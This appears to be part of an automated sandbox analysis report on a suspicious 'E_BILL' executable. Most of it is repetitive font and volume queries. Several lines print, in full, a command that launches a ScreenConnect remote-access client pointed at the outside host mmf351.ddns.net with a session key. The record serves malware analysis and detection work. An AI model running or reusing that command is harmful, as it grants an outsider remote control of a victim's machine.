Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\n792aezk.t2t\924zhom1.d1t\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\screenconnect.clientservice.exe" "?e=support&y=guest&h=mmf351.ddns.net&p=8041&s=89e470af-f42d-4b2f-ad1d-717711c7c76a&k=bgiaaackaabsu0exaagaaaeaaqcpdljbb2ucjqst7j%2beal4srxbn9fngdmzusse%2fjh%2bnkbeoqfhq%2bcr3lypd1ksb17orwp4zvhy7bt585yzidtesloqjgvuwzeifwaakwkfbshg%2fh8gyvt85w1oivud0hejmjtqedcojxvxpd4ojuqhoqhbbylosnsbfrtp0r040%2bcfkcnslvuf01cnsbcaeyuefrkiz%2b8o0yjwrixe6vdrb5cxn%2bauv36m92%2b6%2fhnc5srzm45hr1fu47wa4rara8onacyafp32je3t2cm7eekmt%2bs6hwkgazmp0vlkbgpw3wnp85fhslyn9uz3eztsbn%2f97cfe2jsav4%2brdgima3na8&r=&i=untitled%20session" "1"
Source: unknown	Process created: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\n792aezk.t2t\924zhom1.d1t\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\screenconnect.clientservice.exe" "?e=support&y=guest&h=mmf351.ddns.net&p=8041&s=89e470af-f42d-4b2f-ad1d-717711c7c76a&k=bgiaaackaabsu0exaagaaaeaaqcpdljbb2ucjqst7j%2beal4srxbn9fngdmzusse%2fjh%2bnkbeoqfhq%2bcr3lypd1ksb17orwp4zvhy7bt585yzidtesloqjgvuwzeifwaakwkfbshg%2fh8gyvt85w1oivud0hejmjtqedcojxvxpd4ojuqhoqhbbylosnsbfrtp0r040%2bcfkcnslvuf01cnsbcaeyuefrkiz%2b8o0yjwrixe6vdrb5cxn%2bauv36m92%2b6%2fhnc5srzm45hr1fu47wa4rara8onacyafp32je3t2cm7eekmt%2bs6hwkgazmp0vlkbgpw3wnp85fhslyn9uz3eztsbn%2f97cfe2jsav4%2brdgima3na8&r=&i=untitled%20session" "1"
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\n792aezk.t2t\924zhom1.d1t\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\screenconnect.clientservice.exe" "?e=support&y=guest&h=mmf351.ddns.net&p=8041&s=89e470af-f42d-4b2f-ad1d-717711c7c76a&k=bgiaaackaabsu0exaagaaaeaaqcpdljbb2ucjqst7j%2beal4srxbn9fngdmzusse%2fjh%2bnkbeoqfhq%2bcr3lypd1ksb17orwp4zvhy7bt585yzidtesloqjgvuwzeifwaakwkfbshg%2fh8gyvt85w1oivud0hejmjtqedcojxvxpd4ojuqhoqhbbylosnsbfrtp0r040%2bcfkcnslvuf01cnsbcaeyuefrkiz%2b8o0yjwrixe6vdrb5cxn%2bauv36m92%2b6%2fhnc5srzm45hr1fu47wa4rara8onacyafp32je3t2cm7eekmt%2bs6hwkgazmp0vlkbgpw3wnp85fhslyn9uz3eztsbn%2f97cfe2jsav4%2brdgima3na8&r=&i=untitled%20session" "1"	Jump to behavior

Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1916214053.0000000000AC2000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr	Binary or memory string: Progman
Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1916214053.0000000000AC2000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr	Binary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass

Language, Device and Operating System Detection

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\E_BILL9926378035.exe

Code function: 0_2_00EF1BD4 cpuid

0_2_00EF1BD4

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
